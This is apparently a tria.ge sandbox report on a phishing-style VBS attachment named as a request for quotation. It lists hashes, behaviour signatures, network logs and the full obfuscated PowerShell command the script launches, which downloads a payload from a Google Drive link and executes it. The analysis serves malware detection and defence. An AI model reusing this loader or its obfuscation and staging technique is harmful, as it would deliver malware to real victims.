Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

1

Request fo...24.vbs

windows7-x64

8

Request fo...24.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    119s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    15/10/2024, 07:12 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Request for Quotation MK FMHS.RFQ.10.24.vbs

  • Size

    29KB

  • MD5

    4e4a0cf55522747307400f46995c785c

  • SHA1

    6fba2e0b4fa0ada0c8d8a55a50b5e05e5a4668c1

  • SHA256

    08397cf6fd972e74c1be43021f5af0e60a031844b92d196b2e9f356e15eb4d12

  • SHA512

    71b1014af85207fa1e722238a10dc6511a01527eba1d75d3ce5ee166be83a704043772170572d659206f0f9e48ab56cdbcaedf979c42357a3f8dca3f83b8f174

  • SSDEEP

    384:e5vxs5Mrgr9603OFTxLasx9I98I5xyeQAB+4vkpz215y5aYPVit:e5vxM9TOFTUsxi8CyTXQLWtit

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Quotation MK FMHS.RFQ.10.24.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:768
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Underskrid tidsplans Daunton Paaklistrede forfra Samlerens Administrator #>;$Busing='Fritog';<#Forestillingskredsene Flintglassets Sphaeristeria #>;$Rottegiftenes=$Rundsaves+$host.UI;function Friktion($Apogaeic){If ($Rottegiftenes) {$Forkrppe++;}$Gossipingly=$Sevrdigheden+$Apogaeic.'Length'-$Forkrppe; for( $Nondefined=5;$Nondefined -lt $Gossipingly;$Nondefined+=6){$Sbladens++;$Fernambuck+=$Apogaeic[$Nondefined];$Nationaliteternes='Jagende';}$Fernambuck;}function Goutish($Repairmen){ . ($Gangarealer) ($Repairmen);}$Looplet=Friktion 'BlodkML thooHacenzKommii othelConnelDysphaMo ar/Ferru ';$Looplet+=Friktion ',erio5 .ene.,irst0 Aofa Befol( Gi lWFje niPreffnExptldAn eroE.stew GloesBereg P romN yslT Outt Churc1Usual0Rustn.Count0selsk;Kroku F arWDeseri ompan Bren6Capac4Sup.r;Unmol Omfo.xL vel6Unaff4 Epic; Flin D ditrAktiovExha :Off.c1 i,du3I lac1Vanda. Amat0 Puga)Perle Sna,jGSplineEmigrcSkvetkAkemboLenie/strop2Sub i0Fiske1Verds0Carya0Nim,l1Co,in0Maski1 Shop A.terFskinki bechrSelere FingfHol no.anolx ntra/Ka,ne1U aff3skums1Skriv.Formu0 Unde ';$Pajernes=Friktion 'KlapjUCafndsUnacceTra wRMoabi-DivinA BreagAdelseBrndenSkismT tink ';$Extrafine=Friktion 'Irroth chiftUbesvtStethp oncos lud:to al/Uncon/ grapdHakkerHypocivenalv Ha.le Ko m.Nonp gPrepooSygdooWell gPredil ntiteLandh.DraftcclonooSe.iumstu,i/UnfrouLouiscRe,re?SchooeMolybxLoyalpFo,kvoBilagrPhilotGiant=FootpdDjvleoGuil,wJagtdnBrystlJuxt.o njoiaProgrdBjerg&,eroni BarddKnyst=beske1Nones4bellymLandfCSen,uVM.noeXSa.mepHje tn RaadOStatiNge fd3Da hnOTendeX Ge,f5uk uk9.mmersInt gfH moc0 ,paceSuba,8KrakkcAmm cN,olhjGFremsoP,ofe5 sumpJChamp1AlignlNonrel Unw 6P gonsNummeeCrawl1Typ l ';$Poliosis=Friktion 'Sp.ci>Penta ';$Gangarealer=Friktion 'VirksIImpenEEds,oX ham ';$Renders='Sude';$misfortolkninger='\Preguess.Sem';Goutish (Friktion ' egiv$Afsi gGuid lEteocoScho,b ibwaMisruLBrain:Jugl mSnooteQuinitUrmagaSpndiCTorgui StroSrudimmSk bsuWurlesWings=Nooke$TilbaeUn ernimmanvPlast:SammeAPa tepAnkr.p A biDSh rta WeirTBon lA ort+Propa$S.irrMCirk IOutp sBrtsef AfseoMelder ubteTFreezOGr ntLDraffkUnb.unUnderi rillN AfsnGO dboEbolomr Pneu ');Goutish (Friktion 'Gran,$mahogGGynaeLNedbrOTriodB LensA OrycLTepar:Gy,namW rkii akubSZulukD FultEVirges enerc hvilR iscoiUnsarbValnde Hun RO.ker= Nos.$ EchieUgelnxMoan,t MyogrSkideaanalef Fin I NonmnRyghve Teat.AfkomSW step s ecLWaughIPrvettTreti(Scree$MicroPHleriojoaprLNaturIHve oOB tatSFlaarisnobbSSubmi)Tampo ');Goutish (Friktion 'Komp.[Cin,aNMisfoE s peT Skot.Sko sSMorgeESupe,r RingVMisteiNonexCLivsfeUpploP BrugOAccepI ngornDiambt DissM.torkAHe acnLol,ua AlarG ImpaE Un eRFlles] An,i: Led :,ubasSTypolEtabulcLymphUA gorr,efteiUdsputSeignYBrug.p SemeR IldeOPolemtUndraoForstcRiddeotrapalUnsp M,ksi=Stult Befs[BrndeN LandeP stbtEpok..HelbrsBihuleSlyngcRolleUSkiffRChub,iIronbtChaffY.dnvnpDepotR ParroPuritTGetliOu orsCAnt.co P ntlFejlktMoseoYS,adsP UnwieOpg v] ropo:Pant,:AccustKodifL ilttSUdst 1Talri2Salon ');$Extrafine=$Misdescriber[0];$Nonresistiveness=(Friktion ' darm$ uccog F otlKag doKniplb eaanATr.plL ujon: Komakantico sp nddelayeManorKScin S hiloEblot,RTinsesVarer= ArsenHy eiEaetioW maur-P.ojeOJenbrbHjrefJ,asoseIgangcLowertTread L coms TundySynags dsortBenziESk pimfu,fu.BaskeNS.essEForkuT misk.A benW Jor EA.modBteleoc engrLsubs.I Fat,eHup oN Cip,TDocke ');Goutish ($Nonresistiveness);Goutish (Friktion ' .cce$Dobbeksoleno DiskdV.diaeInterktripls Dol eSnakkrUterlsEt ge.RetsmHIntereBanesaBrkagdRimene oibwrUn.lusKrsan[ Lyst$MatemPFavaga elekjTookee Vrg,rErst nCoulieGehr sTrbe,]Sa ba=Lever$OplgrLEmpo,oMargioMnstepSkjullMastueLoftstServi ');$Handlock=Friktion 'Ellev$EndoskCathoo CecoddecaseKrtegkTre.isGaleyeBre.yrnorm.sSvind.Ov raDEchogo.everwSulc.nUppe,lGrandoPhysia.visadMockeFSaliniRen,el Calle.elat(Betle$DefilEApproxPersptscrolrBndela Mic fTjeriic.stunFejlmeDefa ,Fors $ TndeWRestrhLoegniVaar.tSammeeScolilH iveiSpn in Or deRoman)Folke ';$Whiteline=$Metacismus;Goutish (Friktion 'Lacun$ M,nig Enc lCrustoOprikBYdervA A.ieLFremd: LeneLUintaeBl,ahvC arrESiegedVvestyKv vagBestrtCountiAfskrg lykE Cine=Overs(Ud rtTTr chENonstsIn.amtcurta- BortpAddreASkamsTAlkohh Brmm Propa$ GobbW SemihPothoI Exp TArkivEadfrdLRussiIRe isnJokereFor.m)Xanth ');while (!$Levedygtige) {Goutish (Friktion 'Skriv$ ightgStrmnlEpochoImitabLongwa Blufl Xeno: VitrFSprj r.enataCar agIrkesaLauroa St,d=Phala$I agit Tid rThermuCorcheM,ljt ') ;Goutish $Handlock;Goutish (Friktion 'Mi imsUudtmtFlat.AV rkerStavet Anal-Vis iSRu soLMisspEBorgeE NonrpPal,m Pr.li4forfl ');Goutish (Friktion ' Envi$ ictGGippoLDicepOGemysB ReteAPa alLBed i:UnthiL BotoE FoalvApparE .ithDS ereyPeriogMe,int,jensi PumpGParabeSteg.=Endow(sev,dtSheareKnowesP.rtaT C,vi-MobilpMusikaligemthal khudhng Subti$SceptWPlanlHFo taiMisfoT SlagERegneLCarnaITotalNStar ePre o)Stabi ') ;Goutish (Friktion 'Midit$brugigMethelRes lo rmwpB Dis aBrugelT.lda:ExotiiBestrNSymbiTPolitE Distn Unf sBliveiBrillFA.oreyLinieiExcitnKr,beGMa su= .iag$ allgRestol ,lskoNaturbUmbraaUmagelDiffu:ThymiDViduniBagskAPentaL CejaO ,akoNBibitiUdstrASpelbNIsaco2Devit4New a+ ede+ Apop%Baseb$CrevemAnse iFu ursKuttaDOxypheRaadgSVen acVetoiR,elieiMicroBEndemeCloa RPuriv.St.mncFindeOElsdyuFiskenFobskTSansc ') ;$Extrafine=$Misdescriber[$Intensifying];}$Peritoneums=287836;$Wastable=31186;Goutish (Friktion ' Ydel$TragiGGttelLH andoVarebB rinca DebilThroa:FejlbBIndd,rFuguenSarcaDTera E SheknSubtel BrutD.onfeeUnhelnLuigi2D dde5Mongr1Undes uncr=Satyr UncapG MiniERipostKnast-ArchicLeonooVillaNOmegntCuld.eDerivn nuseT Fana Circu$Choopw KaraH GaffIStr.gtForhoEEucallBiaseiPi.heN Handeledni ');Goutish (Friktion 'Trakd$FriezgEmulglBalano DudibQuadrarovsglInvas: Tr.aTAfterjCirkeeUnbennStatset,omisSkyrstIchtheAnthomLim iaNatbon,dlgndrhabds ewilSkkevoIsopovBeslaeUddatnAutoe1Bghjo8.ipsd1Pikep Inst=Witta Demol[BrabaSdiskpyHunkssRenuntAmtsleRestamR dyp.Hu.usC SlidoEgenpn DiadvKbteseMacarrrepanturokk]Month:Dksbl:.vejsF ellurStilbo D momB.adtB N,eraRigsbsAfvu.eDes l6Api i4ElevtS IndttPh sprDouseiCrocendove.g V.st(Musik$ L stBToperrurolynUncondOceanecablenUnilal Suppd CruceVe stnInspa2Ha te5Spir 1Borta)subfr ');Goutish (Friktion 'efter$Raw pGTasselBil.iOBdecaBMagirALe edlDeter: Ufors cybaKOleomrU.aadICentgv A.taE SilkP rophuDrmaaLOmstyTAfmatEAntiks Ured writh=O,der Mar.n[InspisUmpywyK.ldsSSa metTraktEP ancMDrift. ZabaTFyndiea calxSlo aTpolic.pralee Fi,mNDraciCVr igO godsd AfteI psenn TwodGThreo] Raad:Armga:ArbejA ubecsLyriccProspI TnkeIlodt.. dataG rdseECatfiT nswaSKal.nTSemulR N ukifor rn MezeGgl ni( ihrd$EntenTNi.otj Mil,EThermNUnejeespjttSatridTBe reESknheMS etiaLarrenVe bydRev,rSKuledl .ndeOscenavTwillETestenu der1Kltr 8Undet1Synod) ycos ');Goutish (Friktion 'headp$RnnesgMundelRelikODef lB Un.gAsubcoL Chas:Albi.OCentrRIndfabSyvene StvslOrsedLopist1 Hy e=Bl,ar$FicklSU cerkLb hjRIn aliLig ev .ermeFarvePV ggeU UdebLkodnit ModsEUn mbsPrin,.Bese.SGlabrUspli,bDioleSAnthrtSlagmR brugiAma oN egioGPlas (Rekre$ BodiP Pre,efiddlrAnskuI.inyltEnochOMrkvrNStartEDebatuspadoMFngsesGasli, Po y$Fila.w bag,aStrumSForsgTPubliArevelB,ondil.atcheHjert)Afpud ');Goutish $Orbell1;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2704

Network

  • flag-us
    DNS
    drive.google.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    drive.google.com
    IN A
    Response
    drive.google.com
    IN A
    172.217.16.238
  • flag-gb
    GET
    https://drive.google.com/uc?export=download&id=14mCVXpnON3OX59sf0e8cNGo5J1ll6se1
    powershell.exe
    Remote address:
    172.217.16.238:443
    Request
    GET /uc?export=download&id=14mCVXpnON3OX59sf0e8cNGo5J1ll6se1 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Tue, 15 Oct 2024 07:12:19 GMT
    Location: https://drive.usercontent.google.com/download?id=14mCVXpnON3OX59sf0e8cNGo5J1ll6se1&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-WmITvthCVlg67H_6mEVXiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    drive.usercontent.google.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    drive.usercontent.google.com
    IN A
    Response
    drive.usercontent.google.com
    IN A
    216.58.201.97
  • flag-gb
    GET
    https://drive.usercontent.google.com/download?id=14mCVXpnON3OX59sf0e8cNGo5J1ll6se1&export=download
    powershell.exe
    Remote address:
    216.58.201.97:443
    Request
    GET /download?id=14mCVXpnON3OX59sf0e8cNGo5J1ll6se1&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Tue, 15 Oct 2024 07:12:20 GMT
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Content-Security-Policy: script-src 'nonce-lAQ865mgOOraNFoEjsvalQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Resource-Policy: same-site
    reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzj0tDikmLw1JBicEqfwRoCxKt_nmNdD8R7Np1nPQDEf2QusTLIXmIV4uG4snrHDjaBF4_ftjEqqSblF8anFGWWpWaUlBQkFmQWpxaVpRbFGxkYmRgaGBjrGRjFFxgAALVyI34"
    Content-Length: 1692
    X-GUploader-UploadID: AHmUCY1LrChVbBcfEdJzbhVaPjeLSWpZxEGO5VlnmKo7eZ0NSAtJXH4D1n4QzoPK_axcFSmE-nQ
    Server: UploadServer
    Set-Cookie: NID=518=XIAN-jzNzNpIXryC_LUjB5DUk02ZMdablrvhAwDlz0s_CzjH7tUI5Qx34l7DKlAlbPbT61ABAdr_IDlF9lnL9Ee0F3PIC4GWap5eVh0u7HJE1UMikdTOneNGnr0tyiq2ZiF1o9AI5F_bK91uJOlPGL6B5D-aFcBjYUVVCyL2wy8wxJg; expires=Wed, 16-Apr-2025 07:12:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
  • 172.217.16.238:443
    https://drive.google.com/uc?export=download&id=14mCVXpnON3OX59sf0e8cNGo5J1ll6se1
    tls, http
    powershell.exe
    901 B
     8.7kB
     9
    11

    HTTP Request

    GET https://drive.google.com/uc?export=download&id=14mCVXpnON3OX59sf0e8cNGo5J1ll6se1

    HTTP Response

    303
  • 216.58.201.97:443
    https://drive.usercontent.google.com/download?id=14mCVXpnON3OX59sf0e8cNGo5J1ll6se1&export=download
    tls, http
    powershell.exe
    975 B
     8.8kB
     10
    12

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=14mCVXpnON3OX59sf0e8cNGo5J1ll6se1&export=download

    HTTP Response

    200
  • 8.8.8.8:53
    drive.google.com
    dns
    powershell.exe
    62 B
     78 B
     1
    1

    DNS Request

    drive.google.com

    DNS Response

    172.217.16.238

  • 8.8.8.8:53
    drive.usercontent.google.com
    dns
    powershell.exe
    74 B
     90 B
     1
    1

    DNS Request

    drive.usercontent.google.com

    DNS Response

    216.58.201.97

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Cab98D8.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • memory/2704-20-0x000007FEF60AE000-0x000007FEF60AF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2704-22-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2704-21-0x000000001B570000-0x000000001B852000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2704-23-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2704-24-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2704-25-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2704-26-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2704-27-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2704-29-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2704-31-0x000007FEF60AE000-0x000007FEF60AF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2704-32-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

    Filesize

    9.6MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.